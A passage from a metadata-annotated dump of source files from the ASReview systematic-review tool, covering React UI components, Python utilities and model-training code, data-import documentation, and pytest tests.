<MenuItem\n key={val[\"name\"]}\n value={val[\"link\"]}\n disabled={val[\"disabled\"]}\n >\n {val[\"name\"]}\n </MenuItem>\n );\n })}\n </Select>\n </FormControl>\n )}\n\n {data && data[\"files\"] && (\n <Stack className={classes.root}>\n <LoadingButton\n disabled={!props.url}\n loading={props.isAddingDataset || isLoading}\n onClick={addFile}\n >\n Add\n </LoadingButton>\n </Stack>\n )}\n\n {isError && (\n <InlineErrorHandler\n message={error?.message + \" Use a valid URL or DOI.\"}\n />\n )}\n {props.isAddDatasetError && (\n <InlineErrorHandler\n message={props.addDatasetError?.message + \" Please try again.\"}\n />\n )}\n </Stack>\n </Root>\n );\n};\n\nexport default DatasetFromURL;\n" }, { "alpha_fraction": 0.6273712515830994, "alphanum_fraction": 0.630081295967102, "avg_line_length": 24.44827651977539, "blob_id": "cf808de2029cd34b1c2e6b0c1f668cd92961769a", "content_id": "ec1c678f9ae38fd2c0dcd2a384e85724bbec63a6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 738, "license_type": "permissive", "max_line_length": 66, "num_lines": 29, "path": "/asreview/webapp/src/Components/BoxErrorHandler.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQueryClient } from \"react-query\";\nimport { Button, Typography } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nconst Root = styled(\"div\")(({ theme }) => ({\n display: \"flex\",\n flexDirection: \"column\",\n alignItems: \"center\",\n padding: 48,\n}));\n\nexport default function BoxErrorHandler(props) {\n const queryClient = useQueryClient();\n const resetQuery = () => {\n queryClient.resetQueries(props.queryKey);\n };\n\n return (\n <Root>\n <Typography align=\"center\" sx={{ color: \"text.secondary\" }}>\n {props.error?.message}\n </Typography>\n <Button variant=\"contained\" onClick={resetQuery}>\n Try to Refresh\n </Button>\n </Root>\n );\n}\n" }, { "alpha_fraction": 0.6240636110305786, "alphanum_fraction": 0.6272905468940735, "avg_line_length": 28.614334106445312, "blob_id": "2d8ce7a461ff983a3a13d30b9e510fde16969d6c", "content_id": "a6b9c72b913efc196e8270e137ce4b4aaa74dfeb", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8677, "license_type": "permissive", "max_line_length": 133, "num_lines": 293, "path": "/asreview/utils.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport functools\nimport os\nimport sys\nimport warnings\nfrom pathlib import Path\nfrom urllib.error import HTTPError\nfrom urllib.parse import urlparse\nfrom urllib.request import urlopen\n\nimport numpy as np\n\nfrom asreview._deprecated import _deprecated_func\n\nif sys.version_info >= (3, 10):\n from importlib.metadata import entry_points as _entry_points\nelse:\n from importlib_metadata import entry_points as _entry_points\n\n\ndef _unsafe_dict_update(default_dict, override_dict):\n \"\"\"\n Using defaults and an overriding dictionary, create a new dictionary.\n This new dictionary has the same values as the default dictionary and\n the same types. Thus, if there are values that are in the overriding\n dictionary, but not in the original, they will be ignored.\n\n Arguments\n ---------\n default_dict: dict\n Starting dictionary with defaults.\n override_dict: dict\n Dictionary with custom values (such as model parameters).\n\n Returns\n -------\n dict\n Merged dictionary.\n \"\"\"\n new_dict = default_dict\n for key in override_dict:\n if key not in default_dict:\n print(f\"Warning: key {key} is being ignored.\")\n\n for key in new_dict:\n if key in override_dict:\n str_val = override_dict[key]\n if isinstance(new_dict[key], bool):\n new_dict[key] = str_val in [\"True\", \"true\", \"T\", \"t\", True]\n else:\n try:\n new_dict[key] = type(new_dict[key])(str_val)\n except TypeError:\n raise TypeError(f\"Error at {key}\")\n return new_dict\n\n\ndef _safe_dict_update(default_dict, override_dict):\n \"\"\"\n Using defaults and an overriding dictionary, create a new dictionary.\n This new dictionary has the same values as the default dictionary.\n Thus, if there are values that are in the overriding\n dictionary, but not in the original, they will be ignored.\n In contrast to the unsafe version, the type should be supplied in the\n default dictionary: key: (value, type).\n\n Arguments\n ---------\n default_dict: dict\n Starting dictionary with defaults.\n override_dict: dict\n Dictionary with custom values (such as model parameters).\n\n Returns\n -------\n dict\n Merged dictionary.\n \"\"\"\n new_dict = {}\n for key in default_dict:\n new_dict[key] = default_dict[key][0]\n\n for key in override_dict:\n if key not in default_dict:\n print(f\"Warning: key {key} is being ignored.\")\n\n for key in new_dict:\n if key in override_dict:\n str_val = override_dict[key]\n type_val = default_dict[key][1]\n if type_val == bool:\n new_dict[key] = str_val in [\"True\", \"true\", \"T\", \"t\"]\n else:\n try:\n new_dict[key] = type_val(str_val)\n except TypeError:\n raise TypeError(f\"Error at {key}\")\n return new_dict\n\n\ndef _deprecated_kwarg(kwarg_map):\n def dec(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n new_kwargs = {}\n for k, v in kwargs.items():\n if k in kwarg_map:\n warnings.warn(f\"Keyword argument '{k}' is deprecated. Use '{kwarg_map[k]}' instead.\", DeprecationWarning) # noqa\n new_kwargs[kwarg_map.get(k, k)] = v\n return func(*args, **new_kwargs)\n return wrapper\n return dec\n\n\ndef _get_filename_from_url(url):\n if not is_url(url):\n raise ValueError(f\"'{url}' is not a valid URL.\")\n\n if Path(urlparse(url).path).suffix:\n return Path(urlparse(url).path).name\n else:\n try:\n return urlopen(url).headers.get_filename()\n except HTTPError as err:\n # 308 (Permanent Redirect) not supported\n # See https://bugs.python.org/issue40321\n if err.code == 308:\n return _get_filename_from_url(err.headers.get(\"Location\"))\n else:\n raise err\n\n\ndef asreview_path():\n \"\"\"Get the location where projects are stored.\n\n Overwrite this location by specifying the ASREVIEW_PATH enviroment\n variable.\n \"\"\"\n if os.environ.get(\"ASREVIEW_PATH\", None):\n asreview_path = Path(os.environ[\"ASREVIEW_PATH\"])\n else:\n asreview_path = Path(\"~\", \".asreview\").expanduser()\n\n asreview_path.mkdir(parents=True, exist_ok=True)\n\n return asreview_path\n\n\ndef get_data_home(data_home=None):\n \"\"\"Return the path of the ASR data dir.\n\n This folder is used by some large dataset loaders to avoid downloading the\n data several times.\n By default the data dir is set to a folder named 'asr_data' in the\n user home folder.\n Alternatively, it can be set by the 'ASR_DATA' environment\n variable or programmatically by giving an explicit folder path. The '~'\n symbol is expanded to the user home folder.\n If the folder does not already exist, it is automatically created.\n\n Parameters\n ----------\n data_home : str | None\n The path to scikit-learn data dir.\n\n \"\"\"\n if data_home is None:\n data_home = os.environ.get(\"ASR_DATA\", Path(\"~\", \"asr_data\"))\n data_home = Path(data_home).expanduser()\n\n if not data_home.exists():\n data_home.mkdir(parents=True, exist_ok=True)\n\n return data_home\n\n\ndef format_to_str(obj):\n \"\"\"Create string from object, concatenate if list.\"\"\"\n if obj is None:\n return \"\"\n res = \"\"\n if isinstance(obj, list):\n res = \" \".join(obj)\n else:\n res = obj\n return res\n\n\ndef pretty_format(result):\n longest_key = max([len(key) for key in result])\n result_str = \"\"\n for key, value in result.items():\n temp_str = \"{{key: <{n}}}: {{value}}\\n\".format(n=longest_key)\n result_str += temp_str.format(key=key, value=value)\n return result_str\n\n\ndef is_iterable(i):\n \"\"\"Check if a variable is iterable, but not a string.\"\"\"\n try:\n iter(i)\n if isinstance(i, str):\n return False\n return True\n except TypeError:\n return False\n\n\n@_deprecated_func(\n \"list_model_names is deprecated, \"\n \"use asreview.models.classifiers.list_classifiers instead\"\n)\ndef list_model_names(group=\"asreview.models\"):\n # Remove because of bug with unused default value.\n return list(_entry_points(group=group).names)\n\n\n@_deprecated_kwarg({\"entry_name\": \"group\"})\ndef list_reader_names(group=\"asreview.readers\"):\n return list(_entry_points(group=group).names)\n\n\n@_deprecated_kwarg({\"entry_name\": \"group\"})\ndef list_writer_names(group=\"asreview.writers\"):\n return list(_entry_points(group=group).names)\n\n\n@_deprecated_func(\n \"get_entry_points is deprecated, \"\n \"use _entry_points(group='asreview.entry_points') instead\"\n)\ndef get_entry_points(entry_name=\"asreview.entry_points\"):\n \"\"\"Get the entry points for asreview.\n\n Parameters\n ----------\n entry_name: str\n Name of the submodule. Default \"asreview.entry_points\".\n\n Returns\n -------\n dict:\n Dictionary with the name of the entry point as key\n and the entry point as value.\n \"\"\"\n\n return {entry.name: entry for entry in _entry_points(group=entry_name)}\n\n\ndef is_url(url):\n \"\"\"Check if object is a valid url.\"\"\"\n try:\n result = urlparse(url)\n return all(\n getattr(result, x) not in [b\"\", \"\"] for x in [\"scheme\", \"netloc\", \"path\"])\n except Exception:\n return False\n\n\ndef get_random_state(random_state):\n \"\"\"Create a RandomState instance.\n\n Parameters\n ----------\n random_state: int, numpy.RandomState\n If it is an integer, seed a new random state.\n If it is a RandomState, return it (nop).\n If it is None, return the random state of numpy.\n \"\"\"\n\n if not isinstance(random_state, np.random.RandomState):\n return np.random.RandomState(random_state)\n\n return random_state\n\n\ndef _get_executable():\n \"\"\"Get the Python executable\"\"\"\n\n return sys.executable if sys.executable else \"python\"\n" }, { "alpha_fraction": 0.6800199151039124, "alphanum_fraction": 0.6835033297538757, "avg_line_length": 36.91509246826172, "blob_id": "eacb96c2168e426c2d1c65c789dd46d2a36625fa", "content_id": "2575a4f8221bc1eb49c45749bcdd7038865852e0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4019, "license_type": "permissive", "max_line_length": 88, "num_lines": 106, "path": "/asreview/models/feature_extraction/sbert.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\ntry:\n from sentence_transformers import models\n from sentence_transformers.SentenceTransformer import SentenceTransformer\nexcept ImportError:\n ST_AVAILABLE = False\nelse:\n ST_AVAILABLE = True\n\nfrom asreview.models.feature_extraction.base import BaseFeatureExtraction\n\n\ndef _check_st():\n if not ST_AVAILABLE:\n raise ImportError(\"Install sentence-transformers package to use Sentence BERT.\")\n\n\nclass SBERT(BaseFeatureExtraction):\n \"\"\"Sentence BERT feature extraction technique (``sbert``).\n\n By setting the ``transformer_model`` parameter, you can use other\n transformer models. For example, ``transformer_model='bert-base-nli-stsb-\n large'``. For a list of available models, see the `Sentence BERT\n documentation <https://huggingface.co/sentence-transformers>`__.\n\n Sentence BERT is a sentence embedding model that is trained on a large\n corpus of human written text. It is a fast and accurate model that can\n be used for many tasks.\n\n The huggingface library includes multilingual text classification models. If\n your dataset contains records with multiple languages, you can use the\n ``transformer_model`` parameter to select the model that is most suitable\n for your data.\n\n .. note::\n\n This feature extraction technique requires ``sentence_transformers``\n to be installed. Use ``pip install sentence_transformers`` or install\n all optional ASReview dependencies with ``pip install asreview[all]``\n to install the package.\n\n Parameters\n ----------\n transformer_model : str, optional\n The transformer model to use.\n Default: 'all-mpnet-base-v2'\n is_pretrained_SBERT: boolean, optional\n Default: True\n pooling_mode: str, optional\n Pooling mode to get sentence embeddings from word embeddings\n Default: 'mean'\n Other options available are 'mean', 'max' and 'cls'.\n Only used if is_pretrained_SBERT=False\n mean: Uses mean pooling of word embeddings\n max: Uses max pooling of word embeddings\n cls: Uses embeddings of [CLS] token as sentence embeddings\n \"\"\"\n\n name = \"sbert\"\n label = \"Sentence BERT\"\n\n def __init__(\n self,\n *args,\n transformer_model=\"all-mpnet-base-v2\",\n is_pretrained_sbert=True,\n pooling_mode=\"mean\",\n **kwargs\n ):\n super(SBERT, self).__init__(*args, **kwargs)\n self.transformer_model = transformer_model\n self.is_pretrained_sbert = is_pretrained_sbert\n self.pooling_mode = pooling_mode\n\n def transform(self, texts):\n _check_st()\n\n if self.is_pretrained_sbert:\n model = SentenceTransformer(self.transformer_model)\n else:\n # If transformer_model is not a pretrained sentence transformer model,\n # add a pooling layer to get the pooled sentence embeddings from the\n # word embeddings\n word_embedding_model = models.Transformer(self.transformer_model)\n pooling_layer = models.Pooling(\n word_embedding_model.get_word_embedding_dimension(),\n pooling_mode=self.pooling_mode,\n )\n model = SentenceTransformer(modules=[word_embedding_model, pooling_layer])\n print(\"Encoding texts using sbert, this may take a while...\")\n X = model.encode(texts, show_progress_bar=True)\n\n return X\n" }, { "alpha_fraction": 0.5236414670944214, "alphanum_fraction": 0.5263231992721558, "avg_line_length": 45.59868240356445, "blob_id": "53c6dfe00da02b2d46697bd4c130245e3eb038ec", "content_id": "491bb65c1954b20e38fd242996a2424f4e1db125", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 7145, "license_type": "permissive", "max_line_length": 124, "num_lines": 152, "path": "/docs/source/data.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Prepare your data\n=================\n\nASReview LAB requires a dataset containing a set of textual records (e.g.,\ntitles and abstracts of scientific papers, newspaper articles, or policy\nreports) obtained via a systematic search. The goal is to review all records\nsystematically using predetermined inclusion and exclusion criteria. Also, it\nshould be expected that only a fraction of the records in the dataset is\nrelevant.\n\nDatasets can be unlabeled as well as :ref:`data_labeled:Partially labeled\ndata` and :ref:`data_labeled:Fully labeled data`. The latter ones are useful\nin the Simulation and Exploration mode. See :ref:`project_create:Project\nmodes` for more information.\n\nThe easiest way to obtain a dataset is via a search engine or with the help of\na reference manager. See :ref:`data:Compatibility` for reference managers\nexport formats supported by ASReview. For more information about the format of\nthe dataset, see :doc:`data_format`.\n\nHigh-quality data\n-----------------\n\nThe algorithms of ASReview LAB work best with high-quality datasets. A\nhigh-quality dataset is a dataset with duplicate records removed, and the data\nis complete. Complete data implies that titles and abstracts are available for\nall (or most) records. See the ASReview blog `Importance of Abstracts\n<https://asreview.ai/blog/the-importance-of-abstracts/>`_ for more ideas on\ncomposing a high-quality dataset.\n\nCompatibility\n-------------\n\nCitation Managers\n~~~~~~~~~~~~~~~~~\n\nThe following table provides an overview of export files from citation\nmanagers which are accepted by ASReview.\n\n+-------------------------------+----------+----------+----------+\n| | **.ris** | **.csv** | **.xlsx**|\n+-------------------------------+----------+----------+----------+\n| **EndNote** | ✅ | N/A | N/A |\n+-------------------------------+----------+----------+----------+\n| **Excel** | N/A | ✅ | ✅ |\n+-------------------------------+----------+----------+----------+\n| **Mendeley** | ✅ | N/A | N/A |\n+-------------------------------+----------+----------+----------+\n| **Refworks** | ✅ | N/A | N/A |\n+-------------------------------+----------+----------+----------+\n| **Zotero** | ✅ | ✅ | N/A |\n+-------------------------------+----------+----------+----------+\n\n- ✅ = The data can be exported from the citation manager and imported in ASReview.\n- N/A = This format does not exist.\n\n\nRIS files used for screening in ASReview LAB can be imported back into the\nreference software and the decision labels can be found in the notes field.\nFor more information see this `instruction video\n<https://www.youtube.com/watch?v=-Rw291AE2OI>`_.\n\nNote: the RIS-pipeline is extensively tested for reference managers Zotero and EndNote.\nHowever, it might also work for other reference managers but is currently not supported.\n\n\n.. note::\n\n When using EndNote use the following steps to export a RIS file (.ris):\n\n - In EndNote, click on the style selection dropdown menu from the main EndNote toolbar.\n - Click \"Select Another Style\".\n - Browse to RefMan (RIS) Export and click \"Choose\".\n - Click on the file menu and select \"Export\".\n - Pick a name and location for the text file.\n - Choose the output format RefMan (RIS) Export and click \"Save\".\n\n\n\nSearch Engines\n~~~~~~~~~~~~~~\n\nWhen using search engines, it is often possible to store the articles of\ninterest in a list or folder within the search engine itself. Thereafter, you\ncan choose from different ways to export the list/folder. When you have the\noption to select parts of the citation to be exported, choose the option which\nwill provide the most information.\n\nThe export files of the following search engines have been tested for their\nacceptance in ASReview:\n\n==================== ======== ======== ======== =========\n\\ **.ris** **.tsv** **.csv** **.xlsx**\n==================== ======== ======== ======== =========\n**CINAHL (EBSCO)** ✅ N/A X N/A\n**Cochrane** ✅ N/A ✅ N/A\n**Embase** ✅ N/A ✅ ✅\n**Eric (Ovid)** ✅* N/A N/A N/A\n**Psychinfo (Ovid)** ✅* N/A N/A N/A\n**Pubmed** X N/A X N/A\n**Scopus** ✅ N/A ✅ N/A\n**Web of Science** ✅ N/A N/A N/A\n==================== ======== ======== ======== =========\n\n- ✅ = The data can be exported from the search engine and imported in ASReview.\n- N/A = This format does not exist.\n- X = Not supported, (see :ref:`data_format:Data format` for other options).\n\n\\* Make sure to uncheck all inclusion options (e.g., \"URL\") when exporting from Ovid.\n\n.. tip::\n\n If the export of your search engine is not accepted in ASReview, you can\n also try the following: import the search engine file first into one of\n the citation managers mentioned in the previous part, and export it again\n into a format that is accepted by ASReview.\n\nSystematic Review Software\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nThere are several software packages available for systematic reviewing, see\nhttps://www.nature.com/articles/s42256-020-00287-7. Some of them use machine\nlearning, while other focus on screening and management. The overview below\nshows an overview of alternative software programs and the compatibility with\nASReview.\n\n+-----------------+-----------+----------+----------+----------+\n| | **.ris** | **.tsv** | **.csv** | **.xlsx**|\n| | | | | |\n+-----------------+-----------+----------+----------+----------+\n| **Abstrackr** | ✅ | N/A | ✅ | N/A |\n+-----------------+-----------+----------+----------+----------+\n| **Covidence**\\* | ✅ | N/A | ✅ | N/A |\n+-----------------+-----------+----------+----------+----------+\n| **Distiller** | X | N/A | ✅\\** | ✅\\** |\n+-----------------+-----------+----------+----------+----------+\n|**EPPI-reviewer**| ✅ | N/A | N/A | X |\n+-----------------+-----------+----------+----------+----------+\n| **Rayyan** | ✅ | N/A | ✅ | N/A |\n+-----------------+-----------+----------+----------+----------+\n|**Robotreviewer**| N/A | N/A | N/A | N/A |\n+-----------------+-----------+----------+----------+----------+\n\n- ✅ = The data can be exported from the third-party review software and imported in ASReview.\n- N/A = This format does not exist.\n- X = Not supported.\n\n\\* When using Covidence it is possible to export articles in ``.ris`` format for different citation managers,\nsuch as EndNote, Mendeley, Refworks and Zotero. All of these are compatible with ASReview.\n\n\\** When exporting from Distiller and if the following error occurs ``Unable to parse string \"Yes (include)\" at position 0``\nset the ``sort references by`` to ``Authors``. Then the data can be imported in ASReview.\n\n\n" }, { "alpha_fraction": 0.6752655506134033, "alphanum_fraction": 0.6818411946296692, "avg_line_length": 33.08620834350586, "blob_id": "948f7f411c4452419958cc0fbeb4ee78b73c92e7", "content_id": "672cfb91258754f656d089e27fbbe6e6e7c91064", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1977, "license_type": "permissive", "max_line_length": 79, "num_lines": 58, "path": "/tests/test_writers.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from pathlib import Path\n\nfrom pytest import mark\n\nfrom asreview import ASReviewData\n\n\[email protected](\"test_file\", [(\"baseline_tag-notes_labels.ris\")])\ndef test_asreview_labels_ris(test_file, tmpdir):\n fp_in = Path(\"tests\", \"demo_data\", test_file)\n asr_data = ASReviewData.from_file(fp_in)\n\n tmp_ris_fp_out = Path(tmpdir, \"tmp_labels.ris\")\n asr_data.to_file(tmp_ris_fp_out)\n asr_data_diff = ASReviewData.from_file(tmp_ris_fp_out)\n\n # Check if input file matches the export file\n assert list(asr_data.title) == list(asr_data_diff.title)\n assert list(asr_data.labels) == list(asr_data_diff.labels)\n\n\[email protected](\"test_file\", [(\"baseline_tag-notes.ris\")])\ndef test_asreview_notes_ris(test_file, tmpdir):\n fp_in = Path(\"tests\", \"demo_data\", test_file)\n asr_data = ASReviewData.from_file(fp_in)\n\n tmp_ris_fp_out = Path(tmpdir, \"tmp_notes.ris\")\n asr_data.to_file(tmp_ris_fp_out)\n\n asr_data_diff = ASReviewData.from_file(tmp_ris_fp_out)\n\n # Check if input file matches the export file\n assert list(asr_data.title) == list(asr_data_diff.title)\n assert list(asr_data.notes) == list(asr_data_diff.notes)\n\n\[email protected](\"test_file\", [(\"ris_issue_992.txt\"), (\"ris_issue_1099.txt\")])\ndef test_asreview_ris(test_file, tmpdir):\n fp_in = Path(\"tests\", \"demo_data\", test_file)\n asr_data = ASReviewData.from_file(fp_in)\n\n tmp_ris_fp_out = Path(tmpdir, \"tmp_ris.ris\")\n asr_data.to_file(tmp_ris_fp_out)\n\n asr_data_diff = ASReviewData.from_file(tmp_ris_fp_out)\n\n # Check if input file matches the export file\n assert list(asr_data.title) == list(asr_data_diff.title)\n\n\ndef test_write_numpy_arrays():\n # This test should catch cases where two numpy arrays\n # are to be evaluated in boolean context. Error is as follows:\n # \"The truth value of an array with more than one element is ambiguous.\n # Use a.any() or a.all()\"\n ###\n # For ris writer, a relevant bug was fixed with commit 70d9497\n pass\n" }, { "alpha_fraction": 0.6689322590827942, "alphanum_fraction": 0.6726595163345337, "avg_line_length": 28.810457229614258, "blob_id": "2f4756548dec5b5f8094a58dbb075bcb2411e909", "content_id": "8596e233d4d1fdba20e98e78c857e5418f384028", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4561, "license_type": "permissive", "max_line_length": 86, "num_lines": 153, "path": "/asreview/webapp/run_model.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport logging\nimport sys\nfrom pathlib import Path\n\nfrom filelock import FileLock\nfrom filelock import Timeout\n\nfrom asreview.models.balance import get_balance_model\nfrom asreview.models.classifiers import get_classifier\nfrom asreview.models.feature_extraction import get_feature_model\nfrom asreview.models.query import get_query_model\nfrom asreview.project import ASReviewProject\nfrom asreview.project import open_state\nfrom asreview.review.base import BaseReview\nfrom asreview.webapp.io import read_data\n\n\ndef get_lab_reviewer(\n as_data,\n project,\n embedding_fp=None,\n verbose=0,\n prior_idx=None,\n prior_record_id=None,\n seed=None,\n **kwargs,\n):\n \"\"\"Get a review object from arguments.\"\"\"\n\n if len(as_data) == 0:\n raise ValueError(\"Supply at least one dataset\" \" with at least one record.\")\n\n with open_state(project) as state:\n settings = state.settings\n\n # TODO: Set random seed.\n # Initialize models.\n # random_state = get_random_state(seed)\n classifier_model = get_classifier(settings.model)\n query_model = get_query_model(settings.query_strategy)\n balance_model = get_balance_model(settings.balance_strategy)\n feature_model = get_feature_model(settings.feature_extraction)\n\n # LSTM models need embedding matrices.\n if classifier_model.name.startswith(\"lstm-\"):\n classifier_model.embedding_matrix = feature_model.get_embedding_matrix(\n as_data.texts, embedding_fp\n )\n\n # prior knowledge\n if (\n prior_idx is not None\n and prior_record_id is not None\n and len(prior_idx) > 0\n and len(prior_record_id) > 0\n ):\n raise ValueError(\"Not possible to provide both prior_idx and prior_record_id\")\n\n reviewer = BaseReview(\n as_data,\n project,\n model=classifier_model,\n query_model=query_model,\n balance_model=balance_model,\n feature_model=feature_model,\n **kwargs,\n )\n return reviewer\n\n\ndef train_model(project):\n \"\"\"Add the new labels to the review and do the modeling.\n\n It uses a lock to ensure only one model is running at the same time.\n \"\"\"\n\n logging.info(f\"Project {project.project_path} - Train a new model for project\")\n\n # Lock so that only one training run is running at the same time.\n lock = FileLock(Path(project.project_path, \"training.lock\"), timeout=0)\n\n with lock:\n\n # Check if there are new labeled records.\n with open_state(project.project_path) as state:\n exist_new_labeled_records = state.exist_new_labeled_records\n\n if exist_new_labeled_records:\n # collect command line arguments and pass them to the reviewer\n as_data = read_data(project)\n\n reviewer = get_lab_reviewer(as_data, project)\n\n # Train the model.\n reviewer.train()\n\n\ndef main(argv):\n # parse arguments\n parser = argparse.ArgumentParser()\n parser.add_argument(\"project_path\", type=str, help=\"Project id\")\n parser.add_argument(\n \"--output_error\",\n dest=\"output_error\",\n action=\"store_true\",\n help=\"Save training error message to file.\",\n )\n parser.add_argument(\n \"--first_run\",\n dest=\"first_run\",\n action=\"store_true\",\n help=\"After first run, status is updated.\",\n )\n args = parser.parse_args(argv)\n\n project = ASReviewProject(args.project_path)\n\n try:\n train_model(project)\n\n # change the project status to review\n project.update_review(status=\"review\")\n\n except Timeout:\n logging.debug(\"Another iteration is training\")\n\n except Exception as err:\n # save the error to the project\n project.set_error(err, save_error_message=args.output_error)\n\n # raise the error for full traceback\n raise err\n else:\n project.update_review(status=\"review\")\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n" }, { "alpha_fraction": 0.5774706602096558, "alphanum_fraction": 0.5787269473075867, "avg_line_length": 28.850000381469727, "blob_id": "544f01ceb2dde83e21a740e78e23dcc0e46fea4f", "content_id": "75e6d9c4facf4a53ef0650306d2aa8f239d51266", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2388, "license_type": "permissive", "max_line_length": 105, "num_lines": 80, "path": "/asreview/webapp/src/ProjectComponents/TeamComponents/EndCollaboration.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useNavigate, useParams } from \"react-router-dom\";\nimport { TeamAPI } from \"../../api/index.js\";\nimport useAuth from \"../../hooks/useAuth\";\nimport { Box, Button, Stack } from \"@mui/material\";\nimport { InlineErrorHandler } from \"../../Components\";\nimport { ConfirmationDialog } from \".\";\n\nconst EndCollaboration = (props) => {\n const [dialogOpen, setDialogOpen] = React.useState(false);\n const { auth } = useAuth();\n const navigate = useNavigate();\n const { project_id } = useParams();\n const [errorMessage, setErrorMessage] = React.useState(undefined);\n\n const handleOpenConfirmationDialog = () => {\n setDialogOpen(true);\n };\n\n const handleCloseConfirmationDialog = () => {\n setDialogOpen(false);\n };\n\n const handleEndCollaboration = () => {\n setDialogOpen(false);\n TeamAPI.endCollaboration(project_id, auth.id)\n .then((data) => {\n if (data.success) {\n navigate(\"/projects\");\n } else {\n let message = \"Could not end the collaboration -- DB failure\";\n console.error(message);\n setErrorMessage(message);\n }\n })\n .catch((err) => {\n let message = `Could not end the collaboration: ${err.message} (${err.code})`;\n console.error(\"Could not invite user\", err);\n setErrorMessage(message);\n });\n };\n\n return (\n <>\n <Box>\n <Box>\n <h2>You are collaborating in this project</h2>\n <p>\n If you would like to end this collaboration, please click on the\n button below:\n </p>\n <Button\n variant=\"contained\"\n color=\"error\"\n onClick={handleOpenConfirmationDialog}\n >\n Remove me from this Team\n </Button>\n {errorMessage !== undefined && (\n <Stack sx={{ padding: 5 }}>\n <InlineErrorHandler message={errorMessage} />\n </Stack>\n )}\n </Box>\n </Box>\n\n <ConfirmationDialog\n open={dialogOpen}\n title={`Removal from project \"${project_id}\"`}\n contents={\n \"Are you sure? You will remove yourself from this project if you click on the 'Remove' button.\"\n }\n handleCancel={handleCloseConfirmationDialog}\n handleConfirm={handleEndCollaboration}\n />\n </>\n );\n};\n\nexport default EndCollaboration;\n" }, { "alpha_fraction": 0.6705039143562317, "alphanum_fraction": 0.6794092059135437, "avg_line_length": 28.512821197509766, "blob_id": "654aaabebcce2baca14b5084da9ba7d73f84b03e", "content_id": "73c749144148f2a5b5abc0959c07e20dc32dd050", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4604, "license_type": "permissive", "max_line_length": 77, "num_lines": 156, "path": "/asreview/webapp/tests/test_database_and_models/test_project_model.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from pathlib import Path\n\nimport pytest\nfrom sqlalchemy.exc import IntegrityError\n\nimport asreview.webapp.tests.utils.crud as crud\nfrom asreview.utils import asreview_path\nfrom asreview.webapp import DB\nfrom asreview.webapp.authentication.models import Project\n\n# NOTE: projects are created from a user account\n\n# #############\n# CREATE\n# #############\n\n\n# test uniqueness of project id\ndef test_uniqueness_of_project_id(user):\n project_id = \"my-project\"\n crud.create_project(DB, user, Project(project_id=project_id))\n assert crud.count_projects() == 1\n with pytest.raises(IntegrityError):\n crud.create_project(DB, user, Project(project_id=project_id))\n\n\n# insert a project successfully\ndef test_inserting_project(user):\n project_id = \"my-project\"\n project = Project(project_id=project_id)\n crud.create_project(DB, user, project)\n assert crud.count_projects() == 1\n # get project\n project = crud.last_project()\n assert project.project_id == project_id\n assert project.owner_id == user.id\n\n\n# #############\n# DELETE\n# #############\n\n\n# deleting a project won't delete its owner\ndef test_not_delete_user_after_deletion_project(user):\n crud.create_project(DB, user, Project(project_id=\"project\"))\n assert crud.count_users() == 1\n assert crud.count_projects() == 1\n # get project\n project = crud.last_project()\n # delete\n DB.session.delete(project)\n DB.session.commit()\n assert crud.count_users() == 1\n assert crud.count_projects() == 0\n\n\n# deleting a project will remove invitations\ndef test_project_removal_invitations(user):\n project = crud.create_project(DB, user, Project(project_id=\"my-project\"))\n user2 = crud.create_user(DB, user=2)\n assert crud.count_users() == 2\n assert crud.count_projects() == 1\n assert crud.count_invitations() == 0\n # invite\n project.pending_invitations.append(user2)\n 